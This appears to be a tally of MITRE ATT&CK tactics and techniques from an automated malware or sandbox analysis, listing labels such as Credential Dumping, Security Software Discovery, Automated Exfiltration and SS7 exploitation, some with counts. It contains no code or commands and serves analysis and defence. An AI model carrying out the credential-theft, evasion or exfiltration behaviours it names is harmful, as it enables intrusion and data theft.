Defense Evasion: Software Packing 1; Scripting 121; File Deletion 1; Obfuscated Files or Information 2; Masquerading 11; Virtualization/Sandbox Evasion 1
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force
Discovery: System Time Discovery 1; Account Discovery 1; Security Software Discovery 321; File and Directory Discovery 3; System Information Discovery 46; Virtualization/Sandbox Evasion 1
Lateral Movement: Remote File Copy 3; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged; Screen Capture
Exfiltration: Data Encrypted 1; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Remote File Copy 3; Standard Cryptographic Protocol 12; Standard Non-Application Layer Protocol 3; Standard Application Layer Protocol 4; Standard Cryptographic Protocol; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or D
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings